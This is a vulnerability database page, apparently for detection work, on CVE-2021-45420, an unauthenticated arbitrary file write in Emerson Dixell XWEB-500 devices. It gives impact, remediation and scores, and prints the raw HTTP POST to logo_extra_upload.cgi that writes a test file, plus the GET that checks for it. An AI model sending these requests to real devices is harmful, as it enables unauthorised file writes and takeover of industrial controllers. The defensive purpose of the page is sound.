🔙 목록으로 돌아가기

CVE-2021-45420: Emerson Dixell XWEB-500 - Arbitrary File Write

TitleEmerson Dixell XWEB-500 - Arbitrary File Write
Authorhackerarpan
SeverityCritical
ImpactUnauthenticated attackers can write arbitrary files to any location on the Dixell XWEB-500 server, potentially uploading malicious CGI scripts or modifying system files.
RemediationApply firmware updates provided by Emerson Dixell or restrict network access to the device.
CVSS Score9.8
EPSS Score0.81099
CVE IDCVE-2021-45420
CWE IDCWE-200
Tags cve cve2021 lfw iot dixell xweb500 edb fileupload intrusive vkev vuln

🔍 Vulnerability Description

Emerson Dixell XWEB-500 contains an arbitrary file write caused by unauthenticated access to /cgi-bin/logo_extra_upload.cgi, /cgi-bin/cal_save.cgi, and /cgi-bin/lo_utils.cgi, letting attackers write any file on the system, exploit requires no authentication.

🌐 HTTP Request

POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Connection: close
Content-Length: 57
Content-Type: application/octet-stream
Accept-Encoding: gzip

38FOwmZOEnRV7HveEJae7b8La8a.txt

dixell-xweb500-filewrite
GET /logo/38FOwmZOEnRV7HveEJae7b8La8a.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.5
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-45420.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-45420.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A